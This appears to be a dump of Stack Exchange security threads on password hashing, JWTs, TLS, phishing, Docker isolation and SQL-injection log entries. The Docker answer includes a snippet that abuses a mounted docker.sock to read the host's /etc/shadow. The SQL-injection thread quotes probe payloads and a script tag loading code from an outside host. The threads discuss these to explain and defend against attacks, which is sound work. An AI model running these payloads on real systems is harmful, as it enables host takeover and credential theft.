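The general idea behind such signed cookies — shown here as a simplified Python sketch of the concept, not Tornado's actual cookie format — is that the server appends a timestamp and an HMAC over the value, keyed with a secret only the server knows, and rejects anything whose signature doesn't verify:

import hmac, hashlib, time

SECRET = b"server-side secret, never sent to the client"   # made-up example key

def sign_cookie(name: str, value: str) -> str:
    timestamp = str(int(time.time()))
    sig = hmac.new(SECRET, f"{name}|{value}|{timestamp}".encode(),
                   hashlib.sha256).hexdigest()
    return f"{value}|{timestamp}|{sig}"

def verify_cookie(name: str, cookie: str, max_age: int = 86400):
    value, timestamp, sig = cookie.rsplit("|", 2)
    expected = hmac.new(SECRET, f"{name}|{value}|{timestamp}".encode(),
                        hashlib.sha256).hexdigest()
    if not hmac.compare_digest(sig, expected):
        return None        # tampered with: treated as if the cookie was never set
    if time.time() - int(timestamp) > max_age:
        return None        # too old
    return value

cookie = sign_cookie("user", "tom")
assert verify_cookie("user", cookie) == "tom"
assert verify_cookie("user", cookie.replace("tom", "admin")) is None   # forgery rejected

Without the server-side secret, a client cannot produce a valid signature for a modified value, which is exactly why editing the cookie by hand gets an attacker nothing.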
{ "source": [ "https://security.stackexchange.com/questions/168807", "https://security.stackexchange.com", "https://security.stackexchange.com/users/155246/" ] }
169,169
One of the lesser used techniques for strong passwords is to use patterns or even straight up repetition, so it can be very long while still being memorable. For example: Thue-Morse 01101001100101101001 becomes 0110-3223-5445-6776-9889 increment parity 20 Fibonacci 1,1,2,3,5,8,13,21,34,55 becomes 0 0 1 2 4 7 12 20 33 54 one less than fibonacci Pi digits 3.1415926535 becomes after 3. is 14159 then 26535 Long prefix 11111119 and 19999999 are primes Repetition aall leetttteerrss aarree ddoouubbleedd eexxcceepptt l Keyboard layout !@@###$$$$%%%%%^^^^^^&&&&&&&********((((((((( Not the best examples but you get the idea. So an actual password might look like this: primes 235 LuA: LualuA LualualuA LualualualualuA Looks easy for humans, but the guessing algorithm surely doesn't know the connection between primes , 235 and the repetition of lua . There's a lot of patterns to work off of and a lot of possible mappings/mutations. Mappings can be layered as well. Words can then be inserted, and short prefixes and suffixes added. If the search space still wasn't large enough you could concatenate two of these to square the number of possible passwords. Is it practically unguessable or do these patterns weaken the passwords enough for specialized algorithms to be able to guess them easily? Their length and usage of non-words should make them immune to any existing password guessing methods as well, so at least they have that benefit. Extra: how much guessing entropy is actually in one of these passwords? There's not really any data to work off of but we could use Fermi estimation to get somewhat close.
As far as I can tell, the question is: They are practically unguessable, right? The answer is a very strong it depends on the kind of attack you're worried about . Also, in the best case, what you're doing is equally as strong as using a password manager's randomly generated passwords, but almost certainly more effort, right? @RoyceWilliams' answer pretty much hits the nail on the head: Generally speaking, if your method becomes weaker once it is known, you're doing it wrong. Let's break this down a little farther. There are two types of password brute-force attacks you need to worry about: Drive-by attacks Aka "opportunistic". Here the attacker is looking for low-hanging fruit: they are attacking all users of the system in parallel, either looking for a single entry-point into the system (in which case any user will do), or they are looking to compromise as many accounts as they can with minimal effort. They are unlikely to try any sort of "algorithmically-generated" lists, because they can get what they want simply by trying the 100,000 most common passwords based on this year's breaches. As long as your password is not on one of those "Top X Most Common Passwords" lists, you're pretty much immune already; you really don't need to go the extra effort. Targeted attacks Here you, and you specifically, have been selected as a target. Maybe there is data on your account that is of value to their employer, maybe you work for your company's IT help desk and sending a phishing email from your account is more likely to succeed. Whatever the reason, you specifically are being studied. They will find your social media posts. They will find your post on this site. They will pull up all passwords of yours from previous breaches to study how you invent your passwords. They will write software to generate guess-lists based on everything they know about you. If they know that you like to use mathematical constants, or quotes from Tolkien, or wtv, they will build the appropriate guess lists. Against a targeted attack, @RoyceWilliams' answer referencing Kerckhoffs's principle is relevant: your scheme needs to be secure even if the attacker knows what the scheme is. You may be clever enough to invent something that passes this test, but I'd bet that whatever you invent will be more effort than just using a password manager with 32-char random passwords. So do that. These two attack models are meant to be a framework for thinking about the threat landscape, not an exhaustive list of things attackers will do. As @Ben points out in comments, there is a sliding scale in between these two that has some characteristics of Drive-by, and some characteristics of Targeted. Where you put your comfort level is your choice; although if you're considering this at all then, for the minimal extra effort, you might as well go all the way to the top and use a password manager.
{ "source": [ "https://security.stackexchange.com/questions/169169", "https://security.stackexchange.com", "https://security.stackexchange.com/users/158637/" ] }
169,320
The site which I maintain has been in production for 3 years. When you register, the site generates a large (20 digit) random hex password for you. It's stored MD5 hashed unsalted. When I told the lead dev that MD5 is bad for passwords he said if bad guys get it there's no way they can crack it because the password is random. And even if the bad guy cracks it we generate it so users can't reuse it on other sites. How can I convince him that we need to use best practices? He is very stubborn...
Ok, so the site generates a random password for each user at registration time. An important question is whether a user can manually set their password later, or if they are forced to use a random site-generated password. Let's look at the two cases separately.

Random passwords As far as I can tell, this is the scenario you are describing in the question. Unfortunately, your dev is (mostly) right. At least about a single iteration of hashing vs a big slow hash. Your question kinda has the flavour of blindly applying "best practices" without considering what those practices were intended for. For a brilliant example of this, here's a good read: The Guy Who Invented Those Annoying Password Rules Now Regrets Wasting Your Time

Suggestion Do switch from MD5 to SHA256, probably add a per-user salt, and maybe consider going to 32 char passwords. But adding a big slow hashing function will increase your server load for little to no added security (at least barring any other goofs in your implementation).

Understanding hashing as a brute-force mitigation The amount of work a brute-force attacker who has stolen your database needs to do to crack password hashes is roughly: entropy_of_password * number_of_hash_iterations * slowness_of_hash_function where entropy_of_password is the number of possibilities, or "guessability" of the password. So long as this "formula" is higher than 128 bits of entropy (or equivalent work factor / number of hash instructions to execute), then you're good. For user-chosen passwords, the entropy_of_password is abysmally low, so you need lots of iterations (like 100,000) of a very slow hash function (like PBKDF2 or scrypt) to get the work factor up. By "20 digit hex password" I assume you mean that there are 16^20 = 2^80 possible passwords, which is lower than "best-practice" 2^128, but unless you're a government or a bank, you probably have enough brute-force security from the entropy of the password alone. Salts also serve no purpose here because pre-computing all the hashes is like 2^80 * 32 bits/hash, which is roughly 1 ZB (or 5000 x the capacity of all hard drives on the planet combined). Rainbow tables help this a bit, but quite frankly, any attacker capable of doing that, deserves to pwn all of us. You still want to hash the password to prevent the attacker from walking away with the plaintext for free, but one hash iteration is sufficient. Do switch from MD5 to SHA256 though, and maybe consider going to 32 char passwords.

Human brain passwords Commenters on this thread seem obsessed with the idea that, despite your statement that the site generates passwords, users can in fact choose their own passwords. As soon as the user has the possibility to change the password, a single hash iteration is not an option for storing the now low-entropy password. In this case you are correct that you need to do all the best practice things for password storage.

Salting Either way (user-chosen or random passwords) you probably want a per-user salt. If user-chosen, then salts are part of the best practices. 'nuff said. If random, @GordonDavisson points out a really nice attack in comments [1], [2] based on the observation that a db lookup is essentially free compared to a hash computation. Computing a hash and comparing it against all users' hashes is essentially the same cost as comparing it against a specific user's hash. 
So long as you're happy getting into any account (rather than trying to crack a specific account), then the more users in the system, the more efficient the attack. For instance, say you steal the unsalted hashed password db of a system with a million accounts (about 2^20). With 2^20 accounts, you statistically expect to get a hit in the first 2^60 guesses. You're still doing O(2^80) guesses, but O(2^60) hashes * O(2^20) db lookups ~= O(2^60) hashes. Per-user salts are the only way to prevent attacking all users for the cost of attacking one user.
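A minimal sketch of the scheme this answer suggests for the random-password case (per-user salt plus a single SHA-256); the record layout and helper names are made up for illustration:

import hashlib, secrets

def generate_password() -> str:
    return secrets.token_hex(16)        # 32 hex chars = 128 bits of entropy

def new_user_record(user_id: str):
    password = generate_password()
    salt = secrets.token_hex(16)        # per-user salt
    digest = hashlib.sha256((salt + password).encode()).hexdigest()
    # Store (user_id, salt, digest); hand `password` to the user once, never store it.
    return {"user_id": user_id, "salt": salt, "hash": digest}, password

def verify(record, candidate: str) -> bool:
    digest = hashlib.sha256((record["salt"] + candidate).encode()).hexdigest()
    return secrets.compare_digest(digest, record["hash"])

record, pw = new_user_record("alice")
assert verify(record, pw)
assert not verify(record, "not-the-password")

If users are ever allowed to choose their own passwords, swap the single SHA-256 for a slow KDF such as hashlib.pbkdf2_hmac (or scrypt/argon2), exactly as the answer describes for the "human brain passwords" case.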
{ "source": [ "https://security.stackexchange.com/questions/169320", "https://security.stackexchange.com", "https://security.stackexchange.com/users/158889/" ] }
169,368
I know the many benefits of SSL for the users of a website. It creates a contract whereby the user can be certain that the entity they're transacting with is who it claims to be and that the information passed is encrypted. I also have some idea about other benefits (e.g. speed benefits from HTTP/2). But something I was wondering recently was whether the website benefits in a similar way from this transaction. That is, does my website become more secure from attacks if I enable SSL? I suppose because I would also know that the client I'm transacting with is certified and information I send them is encrypted. But can't any client act unethically and access my website with self-signed certs, etc., claiming to be whoever they like? By the way, I've come into what knowledge I have in a self-directed way, so if this is a basic question or an XY problem don't hesitate to point me to elementary resources or set me straight. Edit: For everyone continuing to answer or comment with general reasons to use SSL: these are appreciated and no doubt of use to new users. That said, I do make it a part of each website I set up, and was curious specifically about the security benefits. In SE tradition I just want to remind people to keep to the question if possible. (Sorry about the title originally missing the key qualifier!)
You have a few good questions, and a few misconceptions. Let's try to untangle them.

I also have some idea about other benefits (e.g. speed benefits from HTTP/2). Another important one: Search Engine Optimization, since you get GooglePoints for having TLS. (which kinda feeds your point that webmasters need external incentives ...)

I suppose because I would also know that the client I'm transacting with is certified and information I send them is encrypted. ... But can't any client [sic] access my website with self-signed certs? Yes and no, and yes, ... and no. Let's untangle this. TLS client authentication (requiring clients to present certs) is something you usually see on VPN servers, enterprise WPA2 WiFi access points, and corporate intranets. These are all closed systems where the sysadmin has full control over issuing certs to users, and they use this to control which users have access to which resources. This makes no sense in a public website setting, and is definitely a non-standard config for an HTTPS webserver. That said, what you do gain is this: Encrypted TLS session | Client loads login page | Client sends username / password | Client does "logged in things" So you do gain extra confidence that the user is who they say they are because the username / password is no longer sent in the clear, therefore no longer possible for a man-in-the-middle to intercept / modify / steal. After that any of the data the client sends to the server, or gets from the server, is end-to-end encrypted to the client. Generally you're right: this protects the client more than the server, but it does stop man-in-the-middles from injecting malicious stuff into files that the user uploads, or injecting malicious commands to be executed as if they came from that user.

But can't any client act unethically and access my website with self-signed certs, etc., claiming to be whoever they like? Kinda, yes. For a public website, anybody can open a TLS connection. If you want users to authenticate, you need to have a login mechanism on top; TLS does not generally provide this for you (unless you're using the above-mentioned client cert mechanism).

But something I was wondering recently was whether the website benefits in a similar way from this transaction. Basically, the benefits to the server are that any data sent to the user will only be viewed by the intended user. If, for example, you are sending them copies of their financial statements, then your lawyers will be very happy to hear this. It also means that any data received from the user did in fact come from that user, and not from an attacker pretending to be them. If your legitimate users are acting maliciously, well that's a different problem; after all, you chose to give them access to the system. What TLS (+ your own login framework) does is ensure that only legitimate users have access. What they do with that access is not TLS's problem.
{ "source": [ "https://security.stackexchange.com/questions/169368", "https://security.stackexchange.com", "https://security.stackexchange.com/users/145617/" ] }
169,642
I recently had a discussion with a Docker expert about the security of Docker vs. virtual machines. When I told that I've read from different sources that it's easier for code running within a Docker container to escape from it than for a code running in a virtual machine, the expert explained that I'm completely wrong, and that Docker machines are actually more secure in terms of preventing the malicious code from affecting other machines, compared to virtual machines or bare metal . Although he tried to explain what makes Docker containers more secure, his explanation was too technical for me. From what I understand, “OS-level virtualization reuses the kernel-space between virtual machines” as explained in a different answer on this site. In other words, code from a Docker container could exploit a kernel vulnerability, which wouldn't be possible to do from a virtual machine. Therefore, what could make it inherently more secure to use Docker compared to VMs or bare metal isolation, in a context where code running in a container/machine would intentionally try to escape and infect/damage other containers/machines? Let's assume Docker is configured properly, which prevents three of the four categories of attacks described here .
No, Docker containers are not more secure than a VM. Quoting Daniel Shapira : In 2017 alone, 434 linux kernel exploits were found , and as you have seen in this post, kernel exploits can be devastating for containerized environments. This is because containers share the same kernel as the host, thus trusting the built-in protection mechanisms alone isn’t sufficient. 1. Kernel exploits from a container If someone exploits a kernel bug inside a container, they exploited it on the host OS. If this exploit allows for code execution, it will be executed on the host OS, not inside the container. If this exploit allows for arbitrary memory access, the attacker can change or read any data for any other container. On a VM, the process is longer: the attacker would have to exploit both the VM kernel, the hypervisor, and the host kernel (and this may not be the same as the VM kernel). 2. Resource starvation As all the containers share the same kernel and the same resources, if the access to some resource is not constrained, one container can use it all up and starve the host OS and the other containers. On a VM, the resources are defined by the hypervisor, so no VM can deny the host OS from any resource, as the hypervisor itself can be configured to make restricted use of resources. 3. Container breakout If any user inside a container is able to escape the container using some exploit or misconfiguration, they will have access to all containers running on the host. That happens because the same user running the docker engine is the user running the containers. If any exploit executes code on the host, it will execute under the privileges of the docker engine, so it can access any container. 4. Data separation On a docker container, there're some resources that are not namespaced: SELinux Cgroups file systems under /sys , /proc/sys , /proc/sysrq-trigger , /proc/irq , /proc/bus /dev/mem , /dev/sd* file system Kernel Modules If any attacker can exploit any of those elements, they will own the host OS. A VM OS will not have direct access to any of those elements. It will talk to the hypervisor, and the hypervisor will make the appropriate system calls to the host OS. It will filter out invalid calls, adding a layer of security. 5. Raw Sockets The default Docker Unix socket ( /var/run/docker.sock ) can be mounted by any container if not properly secured. If some container mounts this socket, it can shutdown, start or create new images. If it's properly configured and secured, you can achieve a high level of security with a docker container, but it will be less than a properly configured VM. No matter how much hardening tools are employed, a VM will always be more secure. Bare metal isolation is even more secure than a VM. Some bare metal implementations (IBM PR/SM for example) can guarantee that the partitions are as separated as if they were on separate hardware. As far as I know, there's no way to escape a PR/SM virtualization.
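As a concrete illustration of point 5: from inside any container that has the host's /var/run/docker.sock mounted, a few lines of Python using the Docker SDK (the image name and paths below are just an example) are enough to start a fully privileged container with the host's root filesystem bind-mounted, which is effectively root on the host:

import docker

# Talk to the host's Docker daemon through the mounted socket.
client = docker.DockerClient(base_url="unix://var/run/docker.sock")

# Launch a new privileged container with the host's / mounted at /host
# and read a file that only root on the host should be able to see.
output = client.containers.run(
    "alpine",
    "cat /host/etc/shadow",
    privileged=True,
    volumes={"/": {"bind": "/host", "mode": "rw"}},
    remove=True,
)
print(output.decode())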
{ "source": [ "https://security.stackexchange.com/questions/169642", "https://security.stackexchange.com", "https://security.stackexchange.com/users/7684/" ] }
169,654
While unveiling iPhone X, Apple made a statement to this end: With Touch ID, it stated that there was a 1 in 50,000 chance that someone would be able to open your phone with their fingerprint. These numbers were a little better for Face ID, at 1 in 1,000,000. This seems strange as fingerprints are known to be quite unique , though I'm not sure how unique one's face is. In this answer , a graph puts face lower in security to fingerprint: Are these claims (by Apple) realistic and what is the possible maths behind them?
{ "source": [ "https://security.stackexchange.com/questions/169654", "https://security.stackexchange.com", "https://security.stackexchange.com/users/107218/" ] }
169,678
I read today about the CCleaner hack and how code was injected into their binary. People were able to download and install the compromised software before the company had noticed. Isn't this what digital signatures are for? Would signing the binary or providing a checksum have done anything to prevent this? To add to the confusion, in this Reuters news article a researcher claims they did have a digital signature: “There is nothing a user could have noticed,” Williams said, noting that the optimization software had a proper digital certificate, which means that other computers automatically trust the program. How could the OS accept to install a software with an invalid signature? Or can an attacker change the binary and forge the signature?
Based on the incomplete details that have been released so far, the malicious code was inserted before compilation and signing (e.g. on a developer's machine, or on a build server). As a result, the compromised version was signed by exactly the same processes as would be used by the uncompromised version. The flaw was introduced before the signing of the binary took place. Similarly, a checksum would have been calculated based on the results of the compilation, by which point, the malicious code was already present. This is a weak point in all signing architectures - if the process before the signature is compromised, there is no real way to detect it. It doesn't mean they're unhelpful - if the attackers didn't get access to the systems until after the signature had been applied, the tampering would have been detected easily, since the signature wouldn't have matched.
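To see why the signature couldn't help here, consider a stripped-down sketch of a release pipeline. (The signing step is reduced to a keyed digest purely for illustration; a real pipeline signs with a code-signing key, but the ordering problem is the same.)

import hashlib, hmac

SIGNING_KEY = b"vendor-release-key"      # stands in for the real private key

def build(source: str) -> bytes:
    # Stand-in for the compiler: the binary is derived from whatever source it is given.
    return b"BINARY:" + hashlib.sha256(source.encode()).digest()

def sign(binary: bytes) -> str:
    # The signature only covers the bytes that come out of the build.
    return hmac.new(SIGNING_KEY, binary, hashlib.sha256).hexdigest()

def verify(binary: bytes, signature: str) -> bool:
    return hmac.compare_digest(sign(binary), signature)

clean = build("legit source code")
compromised = build("legit source code\n/* injected before compilation */")

# Tampering AFTER signing is caught:
assert not verify(compromised, sign(clean))

# Tampering BEFORE signing is not: the build output is signed as-is,
# so the compromised binary carries a perfectly valid signature.
assert verify(compromised, sign(compromised))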
{ "source": [ "https://security.stackexchange.com/questions/169678", "https://security.stackexchange.com", "https://security.stackexchange.com/users/-1/" ] }
169,771
An interesting feature of HTML5 is the <input pattern="" /> attribute , which allows the browser to validate the input field's value against a regular expression provided by the developer. Subsequently, this binds to the field's ValidityState which can then be queried for UX feedback, to prevent invalid submission, and so on. The server implements the same precondition validation (as well as XSRF). Given this, is this client-side validation pattern mature and adequate , or is it for some reason still desirable to intercept the entire form and subject it to traditional per-field validation before submitting it?
From a security perspective, you need to revalidate everything on the server. This will always be the case, no matter how pretty and advanced HTML5 features become. You simply cannot trust the client. You have no idea if it will follow the HTML5 rules or not. You don't even know if it is a browser. So should you validate the whole form with your own JS client side before submitting it, even if you use the HTML5 features? From a security perspective it doesn't matter. Client side validation has zero security value anyway - see above - so from a security perspective you might just as well not bother doing it at all. Client side validation is purely about user experience. Whether your own JS validation or the HTML5 built-in validation makes for the best UX is an interesting question, but it is not on topic here.
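For example, if the markup is <input name="username" pattern="[A-Za-z0-9_]{3,16}">, the server has to apply the same rule again to whatever actually arrives. A minimal sketch (framework details omitted; the field name and pattern are made up). Note that the HTML pattern attribute is implicitly anchored, so the server-side check needs a full match rather than a substring search:

import re

USERNAME_PATTERN = re.compile(r"[A-Za-z0-9_]{3,16}")

def handle_submission(form: dict) -> dict:
    username = form.get("username", "")
    # Never assume the browser enforced the pattern attribute -- the request
    # may not have come from a browser at all.
    if not USERNAME_PATTERN.fullmatch(username):
        return {"status": 400, "error": "invalid username"}
    # ... proceed with the revalidated value ...
    return {"status": 200}

assert handle_submission({"username": "alice_01"})["status"] == 200
assert handle_submission({"username": "<script>"})["status"] == 400
assert handle_submission({})["status"] == 400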
{ "source": [ "https://security.stackexchange.com/questions/169771", "https://security.stackexchange.com", "https://security.stackexchange.com/users/548/" ] }
169,782
Is there any definitive way to tell if an email is a phishing attempt? What cues should the "average computer" user employ to detect a phishing email?
There are a number of both technical and non-technical ways that someone can identify a phishing attempt. Communicate out of Band. The easiest reliable way is to communicate with the proposed sender out-of-band. Call them, send them a what's app if applicable, signal, whatever. If an organization or an individual didn't send you an email they can tell you over the phone. Just remember to use a phone number that is not included in the email. Proofreading - Much of the spam, even a lot of spear phishing, is very poorly written. Poorly constructed sentences and spelling errors are pretty good indicators of Spam. Hovering over links - Phishing links will typically be "obfuscated" to look like they link to a login page. For instance the text may be https://login.facebook.com however when you hover over the link you notice it's some long verbose domain name. Tell-tale phishing. EDIT : As Mehrdad and Bacon Brad have pointed out this method may provide mixed results. Links can be used in a variety of attacks such as CSRF / XSS attacks, and the link provided may also lead to an authorized third party. Email Headers - Perhaps one of the more tech-savvy way of telling whether or not an email is legitimate is by looking at the E-mail Headers . E-mails contain metadata that states where emails originated from. You can usually tell by looking at the email header if an email originated from an authenticated source with these headers. Note that this is not foolproof as many organizations may outsource mail campaigns, but email coming from a private IP address could indicate a phishing email. Macros - Does the word doc you've just been sent state you need to enable macros in order to see the document? Don't you go doing that. Social Engineering - Many phishing email tactics will play off human emotions and employ many well known Social Engineering techniques. Statements like "You must click on this link and re-activate your bank account within 24 hours or your account will be closed" are meant to make the receiver panic. When we panic we make illogical decisions. If you feel an email is playing off your emotions you might be getting phished. Is this normal behaviour? - Institutions are well versed in the ways of phishing and as such they are not going to ask you to click on embedded links in an email to "reset your password" or "confirm your account". If your spidey sense is tingling, probably phishing. In my experience there is no one silver bullet in dealing with phishing. During penetration tests spear phishing always works. The above information will help you spot attempts to phish you, but the easiest and most efficient way to confirm or deny a phishing attempt is to call the "sender" to confirm if it's legitimate.
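If you'd rather inspect the headers programmatically than by eye, a short sketch with Python's standard email module pulls out the fields that are usually worth reading — the Received chain and the receiving server's SPF/DKIM/DMARC verdicts (the file name is just an example):

from email import policy
from email.parser import BytesParser

with open("suspicious.eml", "rb") as fh:          # example file name
    msg = BytesParser(policy=policy.default).parse(fh)

print("From:       ", msg["From"])
print("Reply-To:   ", msg["Reply-To"])
print("Return-Path:", msg["Return-Path"])

# The Received chain shows which servers actually handled the message
# (the bottom entry is closest to the origin). An unexpected or private IP
# near the bottom is a red flag.
for hop in msg.get_all("Received", []):
    print("Received:", " ".join(hop.split()))

# Your own mail server's SPF/DKIM/DMARC verdicts, if it records them.
for result in msg.get_all("Authentication-Results", []):
    print("Auth:", result)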
{ "source": [ "https://security.stackexchange.com/questions/169782", "https://security.stackexchange.com", "https://security.stackexchange.com/users/119035/" ] }
170,378
I was looking through some data in our database when I came across a bunch of weird user_id entries: user_id -1080) ORDER BY 1# -1149 UNION ALL SELECT 79,79,79,79,79,79,79,79,79# -1359' UNION ALL SELECT 79,79,79,79,79,79,79,79,79,79-- JwSh -1409' ORDER BY 2678# -1480' UNION ALL SELECT 79,79,79# -1675 UNION ALL SELECT 79,79,79# -1760 UNION ALL SELECT 79,79,79,79,79,79,79-- znFh -1817 UNION ALL SELECT 79,79,79,79,79,79# -1841 UNION ALL SELECT 79,79,79,79,79,79,79,79,79-- WiHF -2265) UNION ALL SELECT 79,79,79,79,79,79# -2365 UNION ALL SELECT 79,79,79,79,79,79,79# -2387%' UNION ALL SELECT 79,79,79,79,79-- PHug -2535') UNION ALL SELECT 79,79,79,79,79,79# -2670%' ORDER BY 1# -2847 ORDER BY 2974-- vCjk -2922%' UNION ALL SELECT 79,79,79-- PgNW -3097%' UNION ALL SELECT 79,79,79,79,79,79,79-- vJzG -3675 UNION ALL SELECT 79,79,79# It doesn't seem like anything malicious is being attempted, so part of me thinks this might have been caused by some sort of bug, but then again it is rather suspicious to see SQL inside data entries. What could it be trying to do? Here are a few more examples I found which may be interesting: "><script src=http://xs7x.win/yRjYja></script>JSON #36* "><script src=http://xs7x.win/yRjYja></script>JSON #98* (SELECT CONCAT(0x717a627071,(SELECT (ELT(2849=2849,1))),0x716b627871))
This is the result of someone trying to exploit an SQL injection on your site. Someone tried to detect if your website was vulnerable to a union-based injection . For all the records that you see, it doesn't seem to have worked. You should check your access and error-logs for the affected timespan to see if any further requests were made. One suspicious thing I noticed is that I don't see any entries containing double quotation marks (") which might indicate that they broke the functionality of the site or an injection using double quotation marks worked against your site. You might want to check the relevant source code to see if proper sanitization of parameter values was done. This could also be explained if some other part of your setup blocked requests with double-quotation marks or injections with them were just not attempted.
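If you want to sweep the rest of your tables for similar probes, a quick pattern scan along the following lines can help. This is only a rough Python sketch; the database file, table and column names are hypothetical, and the regex only catches the obvious patterns shown above:

```python
import re
import sqlite3  # stand-in for whatever driver your database actually uses

SQLI_PATTERN = re.compile(
    r"(UNION\s+ALL\s+SELECT|ORDER\s+BY\s+\d+|SELECT\s+CONCAT\(|<script\b)",
    re.IGNORECASE,
)

conn = sqlite3.connect("app.db")  # hypothetical database
for row_id, value in conn.execute("SELECT id, user_id FROM events"):  # hypothetical table
    if value is not None and SQLI_PATTERN.search(str(value)):
        print(f"suspicious row {row_id}: {value!r}")
```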
{ "source": [ "https://security.stackexchange.com/questions/170378", "https://security.stackexchange.com", "https://security.stackexchange.com/users/68338/" ] }
170,388
Context : Angular site is hosted on S3 behind CloudFront, separate from Express server that is used as API and almost all requests are XMLHttpRequests. All requests are sent without cookies (withCredentials = false by default) and I use JWT Bearer token for authentication by taking it from cookies in angular and placing to Authorization header (This technique is kind of what is described in CSRF Wiki page ). On Express site I do not allow Cookie header in Access-Control-Allow-Headers . Cookies have secure: true flag, and are NOT httpOnly because I need to manually access them in angular. Also I've read in this Medium article that JSON-Web-Tokens(JWT )/Bearer Tokens is without a doubt one of the best methods of preventing CSRF Question 1 : Will I add extra security if I'll add X-XSRF-Token header to each request and for example make the mechanism stateless by checking for that same value in JWT payload? (I'we read about it in this thread ) Question 2 : Do I actually need extra security efforts agains CSRF taking all that I described?
This is relevant but doesn't necessarily answer 100% of your question: https://security.stackexchange.com/a/166798/149676 The short of it is that as long as authentication isn't automatic (typically provided by the browser) then you don't have to worry about CSRF protection. If your application is attaching the credentials via an Authorization header then the browser can't automatically authenticate the requests, and CSRF isn't possible. Therefore, I would re-word the quote from your article slightly: it isn't that Bearer Tokens are the best defense against CSRF attacks, but simply that CSRF is an attack vector that specifically attacks requests where the browser automatically provides authentication (typically cookies and basic authentication), and so CSRF doesn't matter if the browser can't authenticate you. You should probably make sure to verify, server-side, that your application isn't silently falling back to cookie validation if the Bearer token is absent. I could see something like that squeaking into an application by accident, and since the cookies will get sent along whether you want them to or not, it could result in an inadvertent CSRF vulnerability on a page that was "supposed" to be immune to CSRF. As a result, I think both your questions one and two can be answered the same way. If you only use authentication via Bearer tokens and not via cookies, then there is no concern of CSRF vulnerability, and no extra steps are required for security.
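A minimal sketch of the "no silent fallback to cookies" check. It is shown in Python with PyJWT purely for illustration (the same idea applies to the Express middleware in the question): authenticate from the Authorization header only, and reject the request outright if it is missing, rather than quietly trying the session cookie. The secret is a placeholder.

```python
import jwt  # PyJWT
from flask import Flask, abort, g, request

app = Flask(__name__)
SECRET = "replace-with-a-real-secret"  # placeholder

@app.before_request
def authenticate():
    header = request.headers.get("Authorization", "")
    if not header.startswith("Bearer "):
        abort(401)  # deliberately NOT falling back to request.cookies here
    try:
        g.claims = jwt.decode(header[len("Bearer "):], SECRET, algorithms=["HS256"])
    except jwt.InvalidTokenError:
        abort(401)
```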
{ "source": [ "https://security.stackexchange.com/questions/170388", "https://security.stackexchange.com", "https://security.stackexchange.com/users/159401/" ] }
170,481
Whenever I enter a login into a new site, Chrome asks me if it should store the login details. I used to believe this was fairly secure. If someone found my computer unlocked, they could get past the login screen for some website using the stored details, but if asked for the password again like during checkout, or if they wanted to login to the service from another device, they would be out of luck. At least, that's what I used to think when I believed the browser did not store the password itself, but a hash or encryption of the password. I have noticed that the browser fills the username and password fields, and the password field indicates the number of characters in the password. I'm one of those people who when asked to change their password just keeps the same password, but changes a number at the end. I know this is bad, but with how often I am asked to change passwords, I really could not remember the number of passwords expected of me. This results in a lot of passwords that are the same, but sometimes I forget what the end number needs to be for a particular login. I could not remember the ending number for a certain login, so I went to a website where the password was stored. I deleted the last couple of characters and tried different numbers and voilà, I knew what the right ending number was. It seems to me that this is a fundamental security flaw. If I can check the last character of my password without checking any others, then the number of tries it takes to crack the password grows linearly with the number of characters, not exponentially. It seems like a short stride from there to say that if someone came to my computer when it was unlocked, a simple script could extract all of the stored passwords for all of the major websites which I have passwords stored for. Is this not the case? Is there some other layer of security that would prevent this?
Chrome not only stores your password text, it will show it to you. Under settings -> advanced -> manage passwords you can find all your passwords for all your sites. Click show on any of them and it will appear in the clear. Hashed passwords work for the site authenticating you. They are not an option for password managers. Many will encrypt the data locally, but the key will also be stored locally unless you have a master password setup. Personally, I use the Chrome password manager and I find it convenient. I also, however, have full disk encryption and lock my screen diligently. Which makes the risk reasonable imho. You seem to be inconsistent (many are) by both selecting memorable passwords and using a password manager. And I may venture to guess you may even repeat the password or at least the theme across many sites. This gives you the worst of both worlds. You get the risks of a password manager without the benefits. With a password manager you trust, you can give each site a unique random password not memorable at all and gain a lot of protection from many very real attack vectors. In exchange for a single point of failure of your password manager. Even with a less than perfect password manager this isn't an unreasonable trade off. With a good password manager this is becoming the consensus best practice. Edit to add: please read Henno Brandsma's answer explaining how the login password and OS support can be used to encrypt passwords, this gives a reasonable level of protection to your passwords when the computer is off/locked (full disk encryption is better) and won't help much if you leave your computer unlocked. Even if the browser requires a password to show the plain text, debug tools will still let you see already-filled passwords, as @Darren_H comments. The previous recommendation still stands: use random unique passwords and a password manager.
{ "source": [ "https://security.stackexchange.com/questions/170481", "https://security.stackexchange.com", "https://security.stackexchange.com/users/160273/" ] }
170,599
Sorry for this possibly silly question, I'm just learning about JWT so please bear with me... I read the JWT docs extensively but I don't understand what prevents a hacker from hijacking the JWT and posing as the user for which it was originally issued. Here's the scenario I'm worried about: suppose a bad actor is somehow able to sniff traffic on my corporate network and also has a simple account on my site. If he is able to find an employee user who has admin or special permissions, can't he log in to the site, receive his SSL cookie, then hijack the employee's JWT and pose as that user now and gain those special permissions? Since I won't be checking the bad actor's credentials again, only their JWT, it seems to me the bad actor could submit the JWT using the site SSL through his simple account... What part of the puzzle am I missing here? Thank you!
JWTs are only an encapsulation of information into a string, with the ability to encrypt this information and detect tampering. JWTs by themselves don't protect against cookie theft or misuse done with sniffing, XSS, CSRF, browser extensions or similar. This means you still need to employ the usual methods to protect the token or cookie against misuse, i.e. use http-only cookies to protect against XSS, use TLS to protect against sniffing, use CSRF tokens or other techniques to protect against CSRF etc. And you might include some information in the protected token which makes misuse harder, like a fingerprint of the browser, source IP of the user etc - see OWASP: Binding the Session ID to Other User Properties . Of course you need to verify this information each time the cookie is used for authorization.
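As a sketch of the "bind the token to other user properties" idea, here is one possible implementation in Python with PyJWT. It is illustrative only: which properties you fingerprint (user agent, source IP, etc.) and how strictly you compare them is a design decision with its own trade-offs (mobile users change IPs frequently, for example), and the secret is a placeholder.

```python
import hashlib
import jwt  # PyJWT

SECRET = "replace-with-a-real-secret"  # placeholder

def fingerprint(user_agent: str, ip: str) -> str:
    # Hash of client properties that should stay stable for one client.
    return hashlib.sha256(f"{user_agent}|{ip}".encode()).hexdigest()

def issue_token(user_id: str, user_agent: str, ip: str) -> str:
    claims = {"sub": user_id, "fp": fingerprint(user_agent, ip)}
    return jwt.encode(claims, SECRET, algorithm="HS256")

def verify_token(token: str, user_agent: str, ip: str) -> dict:
    claims = jwt.decode(token, SECRET, algorithms=["HS256"])
    if claims.get("fp") != fingerprint(user_agent, ip):
        raise jwt.InvalidTokenError("token presented by a different client")
    return claims
```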
{ "source": [ "https://security.stackexchange.com/questions/170599", "https://security.stackexchange.com", "https://security.stackexchange.com/users/160322/" ] }
170,756
